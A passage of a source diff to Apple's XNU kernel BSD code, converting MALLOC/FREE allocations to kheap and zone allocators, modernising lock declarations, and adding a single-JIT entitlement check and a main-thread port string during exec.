DEFAULT_CS_LIBRARY_VA_ENABL #endif /* !SECURE_KERNEL */ int cs_all_vnodes = 0; -static lck_grp_t *cs_lockgrp; - SYSCTL_INT(_vm, OID_AUTO, cs_force_kill, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_force_kill, 0, ""); SYSCTL_INT(_vm, OID_AUTO, cs_force_hard, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_force_hard, 0, ""); SYSCTL_INT(_vm, OID_AUTO, cs_debug, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_debug, 0, ""); @@ -195,10 +193,6 @@ cs_init(void) sizeof(cs_library_val_enable)); #endif #endif /* !SECURE_KERNEL */ - - lck_grp_attr_t *attr = lck_grp_attr_alloc_init(); - cs_lockgrp = lck_grp_alloc_init("KERNCS", attr); - lck_grp_attr_free(attr); } STARTUP(CODESIGNING, STARTUP_RANK_FIRST, cs_init); @@ -474,7 +468,7 @@ csblob_get_size(struct cs_blob *blob) vm_address_t csblob_get_addr(struct cs_blob *blob) { - return 
blob->csb_mem_kaddr; + return (vm_address_t)blob->csb_mem_kaddr; } /* @@ -1553,7 +1547,7 @@ cs_blob_get(proc_t p, void **out_start, size_t *out_length) return 0; } - *out_start = (void *)csblob->csb_mem_kaddr; + *out_start = csblob->csb_mem_kaddr; *out_length = csblob->csb_mem_size; return 0; diff --git a/bsd/kern/kern_descrip.c b/bsd/kern/kern_descrip.c index 8e7f964f6..8952d0220 100644 --- a/bsd/kern/kern_descrip.c +++ b/bsd/kern/kern_descrip.c @@ -124,7 +124,7 @@ #include #include -#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 +#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 kern_return_t ipc_object_copyin(ipc_space_t, mach_port_name_t, mach_msg_type_name_t, ipc_port_t *, mach_port_context_t, mach_msg_guard_flags_t *, uint32_t); void ipc_port_release_send(ipc_port_t); @@ -145,8 +145,6 @@ int unlink1(vfs_context_t, vnode_t, user_addr_t, enum uio_seg, int); static void fdrelse(struct proc * p, int fd); -extern void file_lock_init(void); - extern kauth_scope_t kauth_scope_fileop; /* Conflict wait queue for when selects collide (opaque type) */ @@ -181,6 +179,11 @@ ZONE_DECLARE(fp_zone, "fileproc", sizeof(struct fileproc), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM); ZONE_DECLARE(fdp_zone, "filedesc", sizeof(struct filedesc), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM); +/* + * If you need accounting for KM_OFILETABL consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_OFILETABL KHEAP_DEFAULT /* * Descriptor management. 
@@ -192,9 +195,7 @@ int nfiles; /* actual number of open files */ static const struct fileops uninitops; os_refgrp_decl(, f_refgrp, "files refcounts", NULL); -lck_grp_attr_t * file_lck_grp_attr; -lck_grp_t * file_lck_grp; -lck_attr_t * file_lck_attr; +static LCK_GRP_DECLARE(file_lck_grp, "file"); #pragma mark fileglobs @@ -217,7 +218,7 @@ fg_free(struct fileglob *fg) if (IS_VALID_CRED(fg->fg_cred)) { kauth_cred_unref(&fg->fg_cred); } - lck_mtx_destroy(&fg->fg_lock, file_lck_grp); + lck_mtx_destroy(&fg->fg_lock, &file_lck_grp); #if CONFIG_MACF mac_file_label_destroy(fg); @@ -396,30 +397,6 @@ check_file_seek_range(struct flock *fl, off_t cur_file_offset) } -/* - * file_lock_init - * - * Description: Initialize the file lock group and the uipc and flist locks - * - * Parameters: (void) - * - * Returns: void - * - * Notes: Called at system startup from bsd_init(). - */ -void -file_lock_init(void) -{ - /* allocate file lock group attribute and group */ - file_lck_grp_attr = lck_grp_attr_alloc_init(); - - file_lck_grp = lck_grp_alloc_init("file", file_lck_grp_attr); - - /* Allocate file lock attribute */ - file_lck_attr = lck_attr_alloc_init(); -} - - void proc_dirs_lock_shared(proc_t p) { @@ -1934,11 +1911,8 @@ sys_fcntl_nocancel(proc_t p, struct fcntl_nocancel_args *uap, int32_t *retval) proc_fdunlock(p); pathlen = MAXPATHLEN; - MALLOC(pathbufp, char *, pathlen, M_TEMP, M_WAITOK); - if (pathbufp == NULL) { - error = ENOMEM; - goto outdrop; - } + pathbufp = zalloc(ZV_NAMEI); + if ((error = vnode_getwithref(vp)) == 0) { if (uap->cmd == F_GETPATH_NOFIRMLINK) { error = vn_getpath_ext(vp, NULL, pathbufp, &pathlen, VN_GETPATH_NO_FIRMLINK); @@ -1951,7 +1925,7 @@ sys_fcntl_nocancel(proc_t p, struct fcntl_nocancel_args *uap, int32_t *retval) error = copyout((caddr_t)pathbufp, argp, pathlen); } } - FREE(pathbufp, M_TEMP); + zfree(ZV_NAMEI, pathbufp); goto outdrop; } @@ -2612,9 +2586,12 @@ dropboth: .len = CP_MAX_WRAPPEDKEYSIZE, }; - MALLOC(k.key, char *, k.len, M_TEMP, M_WAITOK 
| M_ZERO); - - error = VNOP_IOCTL(vp, F_TRANSCODEKEY, (caddr_t)&k, 1, &context); + k.key = kheap_alloc(KHEAP_TEMP, CP_MAX_WRAPPEDKEYSIZE, Z_WAITOK | Z_ZERO); + if (k.key == NULL) { + error = ENOMEM; + } else { + error = VNOP_IOCTL(vp, F_TRANSCODEKEY, (caddr_t)&k, 1, &context); + } vnode_put(vp); @@ -2623,7 +2600,7 @@ dropboth: *retval = k.len; } - FREE(k.key, M_TEMP); + kheap_free(KHEAP_TEMP, k.key, CP_MAX_WRAPPEDKEYSIZE); break; } @@ -3019,11 +2996,8 @@ dropboth: proc_fdunlock(p); pathlen = MAXPATHLEN; - MALLOC(pathbufp, char *, pathlen, M_TEMP, M_WAITOK); - if (pathbufp == NULL) { - error = ENOMEM; - goto outdrop; - } + pathbufp = zalloc(ZV_NAMEI); + if ((error = vnode_getwithref(vp)) == 0) { int backingstore = 0; @@ -3051,7 +3025,8 @@ dropboth: (void)vnode_put(vp); } } - FREE(pathbufp, M_TEMP); + + zfree(ZV_NAMEI, pathbufp); goto outdrop; } @@ -3860,14 +3835,14 @@ fdalloc(proc_t p, int want, int *result) numfiles = (int)lim; } proc_fdunlock(p); - MALLOC(newofiles, struct fileproc **, - numfiles * OFILESIZE, M_OFILETABL, M_WAITOK); + newofiles = kheap_alloc(KM_OFILETABL, numfiles * OFILESIZE, + Z_WAITOK); proc_fdlock(p); if (newofiles == NULL) { return ENOMEM; } if (fdp->fd_nfiles >= numfiles) { - FREE(newofiles, M_OFILETABL); + kheap_free(KM_OFILETABL, newofiles, numfiles * OFILESIZE); continue; } newofileflags = (char *) &newofiles[numfiles]; @@ -3890,7 +3865,7 @@ fdalloc(proc_t p, int want, int *result) fdp->fd_ofiles = newofiles; fdp->fd_ofileflags = newofileflags; fdp->fd_nfiles = numfiles; - FREE(ofiles, M_OFILETABL); + kheap_free(KM_OFILETABL, ofiles, oldnfiles * OFILESIZE); fdexpand++; } } @@ -4602,7 +4577,7 @@ falloc_withalloc(proc_t p, struct fileproc **resultfp, int *resultfd, return ENOMEM; } fg = zalloc_flags(fg_zone, Z_WAITOK | Z_ZERO); - lck_mtx_init(&fg->fg_lock, file_lck_grp, file_lck_attr); + lck_mtx_init(&fg->fg_lock, &file_lck_grp, LCK_ATTR_NULL); os_ref_retain_locked(&fp->fp_iocount); os_ref_init_raw(&fg->fg_count, &f_refgrp); @@ -4880,8 
+4855,8 @@ fdcopy(proc_t p, vnode_t uth_cdir) } proc_fdunlock(p); - MALLOC(newfdp->fd_ofiles, struct fileproc **, - i * OFILESIZE, M_OFILETABL, M_WAITOK); + newfdp->fd_ofiles = kheap_alloc(KM_OFILETABL, i * OFILESIZE, + Z_WAITOK | Z_ZERO); if (newfdp->fd_ofiles == NULL) { if (newfdp->fd_cdir) { vnode_rele(newfdp->fd_cdir); @@ -4893,7 +4868,6 @@ fdcopy(proc_t p, vnode_t uth_cdir) zfree(fdp_zone, newfdp); return NULL; } - (void) memset(newfdp->fd_ofiles, 0, i * OFILESIZE); proc_fdlock(p); newfdp->fd_ofileflags = (char *) &newfdp->fd_ofiles[i]; @@ -4960,8 +4934,8 @@ fdcopy(proc_t p, vnode_t uth_cdir) newfdp->fd_kqhash = NULL; newfdp->fd_kqhashmask = 0; newfdp->fd_wqkqueue = NULL; - lck_mtx_init(&newfdp->fd_kqhashlock, proc_kqhashlock_grp, proc_lck_attr); - lck_mtx_init(&newfdp->fd_knhashlock, proc_knhashlock_grp, proc_lck_attr); + lck_mtx_init(&newfdp->fd_kqhashlock, &proc_kqhashlock_grp, &proc_lck_attr); + lck_mtx_init(&newfdp->fd_knhashlock, &proc_knhashlock_grp, &proc_lck_attr); return newfdp; } @@ -5027,7 +5001,7 @@ fdfree(proc_t p) proc_fdlock(p); } } - FREE(fdp->fd_ofiles, M_OFILETABL); + kheap_free(KM_OFILETABL, fdp->fd_ofiles, fdp->fd_nfiles * OFILESIZE); fdp->fd_ofiles = NULL; fdp->fd_nfiles = 0; } @@ -5060,8 +5034,8 @@ fdfree(proc_t p) hashdestroy(fdp->fd_kqhash, M_KQUEUE, fdp->fd_kqhashmask); } - lck_mtx_destroy(&fdp->fd_kqhashlock, proc_kqhashlock_grp); - lck_mtx_destroy(&fdp->fd_knhashlock, proc_knhashlock_grp); + lck_mtx_destroy(&fdp->fd_kqhashlock, &proc_kqhashlock_grp); + lck_mtx_destroy(&fdp->fd_knhashlock, &proc_knhashlock_grp); zfree(fdp_zone, fdp); } @@ -5434,7 +5408,7 @@ sys_fileport_makefd(proc_t p, struct fileport_makefd_args *uap, int32_t *retval) int err; res = ipc_object_copyin(get_task_ipcspace(p->task), - send, MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + send, MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (res == KERN_SUCCESS) { err = fileport_makefd(p, port, 
UF_EXCLOSE, retval); diff --git a/bsd/kern/kern_event.c b/bsd/kern/kern_event.c index 0593bcb08..f3277df75 100644 --- a/bsd/kern/kern_event.c +++ b/bsd/kern/kern_event.c @@ -132,7 +132,11 @@ extern int cansignal(struct proc *, kauth_cred_t, struct proc *, int); /* bsd/ke #define KEV_EVTID(code) BSDDBG_CODE(DBG_BSD_KEVENT, (code)) -MALLOC_DEFINE(M_KQUEUE, "kqueue", "memory for kqueue system"); +/* + * If you need accounting for KM_KQUEUE consider using + * KALLOC_HEAP_DEFINE to define a zone view. + */ +#define KM_KQUEUE KHEAP_DEFAULT #define KQ_EVENT NO_EVENT64 @@ -3474,8 +3478,8 @@ knotes_dealloc(proc_t p) } } /* free the table */ - FREE(fdp->fd_knlist, M_KQUEUE); - fdp->fd_knlist = NULL; + kheap_free(KM_KQUEUE, fdp->fd_knlist, + fdp->fd_knlistsize * sizeof(struct klist *)); } fdp->fd_knlistsize = 0; @@ -6366,8 +6370,8 @@ kq_add_knote(struct kqueue *kq, struct knote *kn, struct knote_lock_ctx *knlc, goto out_locked; } - MALLOC(list, struct klist *, - size * sizeof(struct klist *), M_KQUEUE, M_WAITOK); + list = kheap_alloc(KM_KQUEUE, size * sizeof(struct klist *), + Z_WAITOK); if (list == NULL) { ret = ENOMEM; goto out_locked; @@ -6378,7 +6382,8 @@ kq_add_knote(struct kqueue *kq, struct knote *kn, struct knote_lock_ctx *knlc, bzero((caddr_t)list + fdp->fd_knlistsize * sizeof(struct klist *), (size - fdp->fd_knlistsize) * sizeof(struct klist *)); - FREE(fdp->fd_knlist, M_KQUEUE); + kheap_free(KM_KQUEUE, fdp->fd_knlist, + fdp->fd_knlistsize * sizeof(struct klist *)); fdp->fd_knlist = list; fdp->fd_knlistsize = size; } @@ -8551,7 +8556,7 @@ kevt_pcblist SYSCTL_HANDLER_ARGS ROUNDUP64(sizeof(struct xsockstat_n)); struct kern_event_pcb *ev_pcb; - buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO); + buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO); if (buf == NULL) { return ENOMEM; } @@ -8643,10 +8648,7 @@ kevt_pcblist SYSCTL_HANDLER_ARGS done: lck_rw_done(&kev_rwlock); - if (buf != NULL) { - FREE(buf, M_TEMP); - } - + kheap_free(KHEAP_TEMP, buf, item_size); 
return error; } @@ -8982,10 +8984,7 @@ pid_kqueue_extinfo(proc_t p, struct kqueue *kq, user_addr_t ubuf, err = copyout(kqext, ubuf, sizeof(struct kevent_extinfo) * MIN(buflen, nknotes)); out: - if (kqext) { - kheap_free(KHEAP_TEMP, kqext, buflen * sizeof(struct kevent_extinfo)); - kqext = NULL; - } + kheap_free(KHEAP_TEMP, kqext, buflen * sizeof(struct kevent_extinfo)); if (!err) { *retval = (int32_t)MIN(nknotes, PROC_PIDFDKQUEUE_KNOTES_MAX); diff --git a/bsd/kern/kern_exec.c b/bsd/kern/kern_exec.c index e8a1e25e0..7eef9034f 100644 --- a/bsd/kern/kern_exec.c +++ b/bsd/kern/kern_exec.c @@ -253,7 +253,7 @@ task_t convert_port_to_task(ipc_port_t port); /* * Mach things for which prototypes are unavailable from Mach headers */ -#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 +#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 void ipc_task_reset( task_t task); void ipc_thread_reset( @@ -1192,7 +1192,9 @@ grade: vm_map_set_user_wire_limit(map, (vm_size_t)proc_limitgetcur(p, RLIMIT_MEMLOCK, FALSE)); #if XNU_TARGET_OS_OSX if (p->p_platform == PLATFORM_IOS) { - vm_map_mark_alien(map); + assert(vm_map_is_alien(map)); + } else { + assert(!vm_map_is_alien(map)); } #endif /* XNU_TARGET_OS_OSX */ proc_unlock(p); @@ -1359,6 +1361,14 @@ grade: int cputype = cpu_type(); vm_map_exec(map, task, load_result.is_64bit_addr, (void *)p->p_fd->fd_rdir, cputype, cpu_subtype, reslide); +#if XNU_TARGET_OS_OSX +#define SINGLE_JIT_ENTITLEMENT "com.apple.security.cs.single-jit" + + if (IOTaskHasEntitlement(task, SINGLE_JIT_ENTITLEMENT)) { + vm_map_single_jit(map); + } +#endif /* XNU_TARGET_OS_OSX */ + /* * Close file descriptors which specify close-on-exec. 
*/ @@ -1780,7 +1790,7 @@ exec_activate_image(struct image_params *imgp) /* Use excpath, which contains the copyin-ed exec path */ DTRACE_PROC1(exec, uintptr_t, excpath); - MALLOC(ndp, struct nameidata *, sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO); + ndp = kheap_alloc(KHEAP_TEMP, sizeof(*ndp), Z_WAITOK | Z_ZERO); if (ndp == NULL) { error = ENOMEM; goto bad_notrans; @@ -1927,9 +1937,7 @@ bad_notrans: if (imgp->ip_ndp) { nameidone(imgp->ip_ndp); } - if (ndp) { - FREE(ndp, M_TEMP); - } + kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp)); return error; } @@ -2184,7 +2192,7 @@ exec_handle_port_actions(struct image_params *imgp, if (MACH_PORT_VALID(act->new_port)) { kr = ipc_object_copyin(get_task_ipcspace(current_task()), act->new_port, MACH_MSG_TYPE_COPY_SEND, - (ipc_object_t *) &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + (ipc_object_t *) &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (kr != KERN_SUCCESS) { ret = EINVAL; @@ -2329,7 +2337,8 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags) int mode = psfa->psfaa_openargs.psfao_mode; int origfd; - MALLOC(bufp, char *, sizeof(*vap) + sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO); + bufp = kheap_alloc(KHEAP_TEMP, + sizeof(*vap) + sizeof(*ndp), Z_WAITOK | Z_ZERO); if (bufp == NULL) { error = ENOMEM; break; @@ -2356,7 +2365,7 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags) fileproc_alloc_init, NULL, &origfd); - FREE(bufp, M_TEMP); + kheap_free(KHEAP_TEMP, bufp, sizeof(*vap) + sizeof(*ndp)); AUDIT_SUBCALL_EXIT(uthread, error); @@ -2411,7 +2420,7 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags) kr = ipc_object_copyin(get_task_ipcspace(current_task()), psfa->psfaa_fileport, MACH_MSG_TYPE_COPY_SEND, - (ipc_object_t *) &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + (ipc_object_t *) &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (kr != KERN_SUCCESS) { error = EINVAL; @@ -2606,13 +2615,27 @@ 
exec_spawnattr_getmacpolicyinfo(const void *macextensions, const char *policynam return NULL; } +static void +spawn_free_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, + _posix_spawn_mac_policy_extensions_t psmx, int count) +{ + if (psmx == NULL) { + return; + } + for (int i = 0; i < count; i++) { + _ps_mac_policy_extension_t *ext = &psmx->psmx_extensions[i]; + kheap_free(KHEAP_TEMP, ext->datap, (vm_size_t) ext->datalen); + } + kheap_free(KHEAP_TEMP, psmx, px_args->mac_extensions_size); +} + static int -spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _posix_spawn_mac_policy_extensions_t *psmxp) +spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, + _posix_spawn_mac_policy_extensions_t *psmxp) { _posix_spawn_mac_policy_extensions_t psmx = NULL; int error = 0; int copycnt = 0; - int i = 0; *psmxp = NULL; @@ -2622,8 +2645,14 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p goto bad; } - MALLOC(psmx, _posix_spawn_mac_policy_extensions_t, px_args->mac_extensions_size, M_TEMP, M_WAITOK); - if ((error = copyin(px_args->mac_extensions, psmx, px_args->mac_extensions_size)) != 0) { + psmx = kheap_alloc(KHEAP_TEMP, px_args->mac_extensions_size, Z_WAITOK); + if (psmx == NULL) { + error = ENOMEM; + goto bad; + } + + error = copyin(px_args->mac_extensions, psmx, px_args->mac_extensions_size); + if (error) { goto bad; } @@ -2633,7 +2662,7 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p goto bad; } - for (i = 0; i < psmx->psmx_count; i++) { + for (int i = 0; i < psmx->psmx_count; i++) { _ps_mac_policy_extension_t *extension = &psmx->psmx_extensions[i]; if (extension->datalen == 0 || extension->datalen > PAGE_SIZE) { error = EINVAL; @@ -2650,9 +2679,15 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p goto bad; } #endif - MALLOC(data, void *, (size_t)extension->datalen, M_TEMP, M_WAITOK); - if ((error = 
copyin((user_addr_t)extension->data, data, (size_t)extension->datalen)) != 0) { - FREE(data, M_TEMP); + data = kheap_alloc(KHEAP_TEMP, (vm_size_t) extension->datalen, Z_WAITOK); + if (data == NULL) { + error = ENOMEM; + goto bad; + } + error = copyin((user_addr_t)extension->data, data, (size_t)extension->datalen); + if (error) { + kheap_free(KHEAP_TEMP, data, (vm_size_t) extension->datalen); + error = ENOMEM; goto bad; } extension->datap = data; @@ -2662,28 +2697,9 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p return 0; bad: - if (psmx != NULL) { - for (i = 0; i < copycnt; i++) { - FREE(psmx->psmx_extensions[i].datap, M_TEMP); - } - FREE(psmx, M_TEMP); - } + spawn_free_macpolicyinfo(px_args, psmx, copycnt); return error; } - -static void -spawn_free_macpolicyinfo(_posix_spawn_mac_policy_extensions_t psmx) -{ - int i; - - if (psmx == NULL) { - return; - } - for (i = 0; i < psmx->psmx_count; i++) { - FREE(psmx->psmx_extensions[i].datap, M_TEMP); - } - FREE(psmx, M_TEMP); -} #endif /* CONFIG_MACF */ #if CONFIG_COALITIONS @@ -3064,7 +3080,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) * Allocate a big chunk for locals instead of using stack since these * structures are pretty big. 
*/ - MALLOC(bufp, char *, (sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)), M_TEMP, M_WAITOK | M_ZERO); + bufp = kheap_alloc(KHEAP_TEMP, + sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap), Z_WAITOK | Z_ZERO); imgp = (struct image_params *) bufp; if (bufp == NULL) { error = ENOMEM; @@ -3148,7 +3165,9 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) error = EINVAL; goto bad; } - MALLOC(px_sfap, _posix_spawn_file_actions_t, px_args.file_actions_size, M_TEMP, M_WAITOK); + + px_sfap = kheap_alloc(KHEAP_TEMP, + px_args.file_actions_size, Z_WAITOK); if (px_sfap == NULL) { error = ENOMEM; goto bad; @@ -3175,8 +3194,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) goto bad; } - MALLOC(px_spap, _posix_spawn_port_actions_t, - px_args.port_actions_size, M_TEMP, M_WAITOK); + px_spap = kheap_alloc(KHEAP_TEMP, + px_args.port_actions_size, Z_WAITOK); if (px_spap == NULL) { error = ENOMEM; goto bad; @@ -3204,7 +3223,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) goto bad; } - MALLOC(px_persona, struct _posix_spawn_persona_info *, px_args.persona_info_size, M_TEMP, M_WAITOK | M_ZERO); + px_persona = kheap_alloc(KHEAP_TEMP, + px_args.persona_info_size, Z_WAITOK); if (px_persona == NULL) { error = ENOMEM; goto bad; @@ -3233,8 +3253,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) goto bad; } - MALLOC(px_pcred_info, struct _posix_spawn_posix_cred_info *, - px_args.posix_cred_info_size, M_TEMP, M_WAITOK | M_ZERO); + px_pcred_info = kheap_alloc(KHEAP_TEMP, + px_args.posix_cred_info_size, Z_WAITOK); if (px_pcred_info == NULL) { error = ENOMEM; goto bad; @@ -3270,7 +3290,7 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) * ...AND the parent has the entitlement, copy * the subsystem root path in. 
*/ - MALLOC(subsystem_root_path, char *, px_args.subsystem_root_path_size, M_SBUF, M_WAITOK | M_ZERO | M_NULL); + subsystem_root_path = zalloc_flags(ZV_NAMEI, Z_WAITOK | Z_ZERO); if (subsystem_root_path == NULL) { error = ENOMEM; @@ -4088,27 +4108,25 @@ bad: if (imgp->ip_strings) { execargs_free(imgp); } - if (imgp->ip_px_sfa != NULL) { - FREE(imgp->ip_px_sfa, M_TEMP); - } - if (imgp->ip_px_spa != NULL) { - FREE(imgp->ip_px_spa, M_TEMP); - } + kheap_free(KHEAP_TEMP, imgp->ip_px_sfa, + px_args.file_actions_size); + kheap_free(KHEAP_TEMP, imgp->ip_px_spa, + px_args.port_actions_size); #if CONFIG_PERSONAS - if (imgp->ip_px_persona != NULL) { - FREE(imgp->ip_px_persona, M_TEMP); - } + kheap_free(KHEAP_TEMP, imgp->ip_px_persona, + px_args.persona_info_size); #endif - if (imgp->ip_px_pcred_info != NULL) { - FREE(imgp->ip_px_pcred_info, M_TEMP); - } + kheap_free(KHEAP_TEMP, imgp->ip_px_pcred_info, + px_args.posix_cred_info_size); if (subsystem_root_path != NULL) { - FREE(subsystem_root_path, M_SBUF); + zfree(ZV_NAMEI, subsystem_root_path); } #if CONFIG_MACF - if (imgp->ip_px_smpx != NULL) { - spawn_free_macpolicyinfo(imgp->ip_px_smpx); + _posix_spawn_mac_policy_extensions_t psmx = imgp->ip_px_smpx; + if (psmx) { + spawn_free_macpolicyinfo(&px_args, + psmx, psmx->psmx_count); } if (imgp->ip_execlabelp) { mac_cred_label_free(imgp->ip_execlabelp); @@ -4263,9 +4281,8 @@ bad: proc_rele(p); } - if (bufp != NULL) { - FREE(bufp, M_TEMP); - } + kheap_free(KHEAP_TEMP, bufp, + sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)); if (inherit != NULL) { ipc_importance_release(inherit); @@ -4506,7 +4523,8 @@ __mac_execve(proc_t p, struct __mac_execve_args *uap, int32_t *retval) /* Allocate a big chunk for locals instead of using stack since these * structures a pretty big. 
*/ - MALLOC(bufp, char *, (sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)), M_TEMP, M_WAITOK | M_ZERO); + bufp = kheap_alloc(KHEAP_TEMP, + sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap), Z_WAITOK | Z_ZERO); imgp = (struct image_params *) bufp; if (bufp == NULL) { error = ENOMEM; @@ -4794,9 +4812,8 @@ exit_with_error: proc_rele(p); } - if (bufp != NULL) { - FREE(bufp, M_TEMP); - } + kheap_free(KHEAP_TEMP, bufp, + sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)); if (inherit != NULL) { ipc_importance_release(inherit); @@ -5396,10 +5413,12 @@ extern uuid_string_t bootsessionuuid_string; #define PTRAUTH_DISABLED_FLAG "ptrauth_disabled=1" #define DYLD_ARM64E_ABI_KEY "arm64e_abi=" #endif /* __has_feature(ptrauth_calls) */ +#define MAIN_TH_PORT_KEY "th_port=" #define FSID_MAX_STRING "0x1234567890abcdef,0x1234567890abcdef" #define HEX_STR_LEN 18 // 64-bit hex value "0x0123456701234567" +#define HEX_STR_LEN32 10 // 32-bit hex value "0x01234567" static int exec_add_entropy_key(struct image_params *imgp, @@ -5453,6 +5472,8 @@ exec_add_apple_strings(struct image_params *imgp, { int error; int img_ptr_size = (imgp->ip_flags & IMGPF_IS_64BIT_ADDR) ? 8 : 4; + thread_t new_thread; + ipc_port_t sright; /* exec_save_path stored the first string */ imgp->ip_applec = 1; @@ -5658,6 +5679,26 @@ exec_add_apple_strings(struct image_params *imgp, imgp->ip_applec++; } #endif + /* + * Add main thread mach port name + * +1 uref on main thread port, this ref will be extracted by libpthread in __pthread_init + * and consumed in _bsdthread_terminate. Leaking the main thread port name if not linked + * against libpthread. 
+ */ + if ((new_thread = imgp->ip_new_thread) != THREAD_NULL) { + thread_reference(new_thread); + sright = convert_thread_to_port_pinned(new_thread); + task_t new_task = get_threadtask(new_thread); + mach_port_name_t name = ipc_port_copyout_send(sright, get_task_ipcspace(new_task)); + char port_name_hex_str[strlen(MAIN_TH_PORT_KEY) + HEX_STR_LEN32 + 1]; + snprintf(port_name_hex_str, sizeof(port_name_hex_str), MAIN_TH_PORT_KEY "0x%x", name); + + error = exec_add_user_string(imgp, CAST_USER_ADDR_T(port_name_hex_str), UIO_SYSSPACE, FALSE); + if (error) { + goto bad; + } + imgp->ip_applec++; + } /* Align the tail of the combined applev area */ while (imgp->ip_strspace % img_ptr_size != 0) { @@ -6053,7 +6094,8 @@ handle_mac_transition: continue; } - MALLOC(ndp, struct nameidata *, sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO); + ndp = kheap_alloc(KHEAP_TEMP, + sizeof(*ndp), Z_WAITOK | Z_ZERO); if (ndp == NULL) { fp_free(p, indx, fp); error = ENOMEM; @@ -6066,7 +6108,7 @@ handle_mac_transition: if ((error = vn_open(ndp, flag, 0)) != 0) { fp_free(p, indx, fp); - FREE(ndp, M_TEMP); + kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp)); break; } @@ -6083,7 +6125,7 @@ handle_mac_transition: fp_drop(p, indx, fp, 1); proc_fdunlock(p); - FREE(ndp, M_TEMP); + kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp)); } } } @@ -6537,24 +6579,24 @@ load_return_to_errno(load_return_t lrtn) static int execargs_waiters = 0; -lck_mtx_t *execargs_cache_lock; +static LCK_MTX_DECLARE_ATTR(execargs_cache_lock, &proc_lck_grp, &proc_lck_attr); static void execargs_lock_lock(void) { - lck_mtx_lock_spin(execargs_cache_lock); + lck_mtx_lock_spin(&execargs_cache_lock); } static void execargs_lock_unlock(void) { - lck_mtx_unlock(execargs_cache_lock); + lck_mtx_unlock(&execargs_cache_lock); } static wait_result_t execargs_lock_sleep(void) { - return lck_mtx_sleep(execargs_cache_lock, LCK_SLEEP_DEFAULT, &execargs_free_count, THREAD_INTERRUPTIBLE); + return lck_mtx_sleep(&execargs_cache_lock, LCK_SLEEP_DEFAULT, 
&execargs_free_count, THREAD_INTERRUPTIBLE); } static kern_return_t diff --git a/bsd/kern/kern_exit.c b/bsd/kern/kern_exit.c index c38e6a898..e9dc75475 100644 --- a/bsd/kern/kern_exit.c +++ b/bsd/kern/kern_exit.c @@ -127,6 +127,7 @@ #include #include #include +#include #include #include @@ -935,8 +936,7 @@ exit_with_reason(proc_t p, int rv, int *retval, boolean_t thread_can_terminate, os_reason_free(exit_reason); if (current_proc() == p) { if (p->exit_thread == self) { - printf("exit_thread failed to exit, leaving process %s[%d] in unkillable limbo\n", - p->p_comm, p->p_pid); + panic("exit_thread failed to exit"); } if (thread_can_terminate) { @@ -1004,10 +1004,10 @@ exit_with_reason(proc_t p, int rv, int *retval, boolean_t thread_can_terminate, static void proc_memorystatus_remove(proc_t p) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); while (memorystatus_remove(p) == EAGAIN) { os_log(OS_LOG_DEFAULT, "memorystatus_remove: Process[%d] tried to exit while being frozen. Blocking exit until freeze completes.", p->p_pid); - msleep(&p->p_memstat_state, proc_list_mlock, PWAIT, "proc_memorystatus_remove", NULL); + msleep(&p->p_memstat_state, &proc_list_mlock, PWAIT, "proc_memorystatus_remove", NULL); } } #endif @@ -1069,6 +1069,58 @@ proc_prepareexit(proc_t p, int rv, boolean_t perf_notify) if (kr != 0) { create_corpse = TRUE; } + + /* + * Revalidate the code signing of the text pages 